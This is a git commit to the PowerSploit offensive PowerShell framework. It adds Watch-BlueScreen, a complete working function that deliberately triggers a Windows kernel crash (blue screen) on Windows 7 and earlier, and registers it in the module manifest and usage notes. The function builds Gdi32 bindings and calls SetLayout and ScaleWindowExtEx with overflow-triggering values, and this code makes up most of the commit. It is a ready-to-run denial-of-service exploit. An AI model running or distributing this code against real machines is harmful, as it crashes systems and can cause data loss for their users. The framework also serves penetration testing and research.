Added Watch-BlueScreen
Causes a blue-screen (bugcheck) to occur.
This commit is contained in:
Matt Graeber
parent
f32a572fb9
commit
2a17b8fb56
|
|
@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID =
|
|||
|
||||
# List of all files packaged with this module
|
||||
FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
|
||||
'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Usage.md'
|
||||
'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md'
|
||||
|
||||
# Private data to pass to the module specified in RootModule/ModuleToProcess
|
||||
# PrivateData = ''
|
||||
|
|
|
|||
|
|
@ -0,0 +1,74 @@
|
|||
function Watch-BlueScreen
|
||||
{
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Cause a blue screen to occur (Windows 7 and below).
|
||||
|
||||
PowerSploit Function: Watch-BlueScreen
|
||||
Author: Matthew Graeber (@mattifestation)
|
||||
Original Research: Tavis Ormandy and Nikita Tarakanov
|
||||
License: BSD 3-Clause
|
||||
Required Dependencies: None
|
||||
Optional Dependencies: None
|
||||
|
||||
.NOTES
|
||||
|
||||
Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
|
||||
tweeted this technique on 5/13/2013.
|
||||
|
||||
.LINK
|
||||
|
||||
https://gist.github.com/taviso/4658638
|
||||
http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
|
||||
https://twitter.com/NTarakanov/status/334031968465453057
|
||||
#>
|
||||
|
||||
try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
|
||||
{
|
||||
$DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
|
||||
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
|
||||
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
|
||||
$TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
|
||||
|
||||
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
|
||||
$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
|
||||
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
|
||||
[Reflection.FieldInfo[]]@($SetLastError), @($true))
|
||||
|
||||
$TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
|
||||
'Gdi32.dll',
|
||||
'Public, Static',
|
||||
'Standard',
|
||||
[IntPtr],
|
||||
@([IntPtr]),
|
||||
'Winapi',
|
||||
'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
|
||||
|
||||
$TypeBuilder.DefinePInvokeMethod( 'SetLayout',
|
||||
'Gdi32.dll',
|
||||
'Public, Static',
|
||||
'Standard',
|
||||
[UInt32],
|
||||
@([IntPtr], [UInt32]),
|
||||
'Winapi',
|
||||
'Auto' ) | Out-Null
|
||||
|
||||
$TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
|
||||
'Gdi32.dll',
|
||||
'Public, Static',
|
||||
'Standard',
|
||||
[Bool],
|
||||
@([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
|
||||
'Winapi',
|
||||
'Auto' ) | Out-Null
|
||||
|
||||
$Gdi32 = $TypeBuilder.CreateType()
|
||||
}
|
||||
|
||||
$LAYOUT_RTL = 1
|
||||
|
||||
$DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
|
||||
$Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
|
||||
$Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
|
||||
}
|
||||
|
|
@ -20,6 +20,10 @@ Injects shellcode into the process ID of your choosing or within PowerShell loca
|
|||
|
||||
Execute shellcode within the context of the running PowerShell process without making any Win32 function calls.
|
||||
|
||||
#### `Watch-BlueScreen`
|
||||
|
||||
Cause a blue screen to occur (Windows 7 and below).
|
||||
|
||||
## ScriptModification
|
||||
|
||||
**Modify and/or prepare scripts for execution on a compromised machine.**
|
||||
|
|
|
|||
Loading…
Reference in New Issue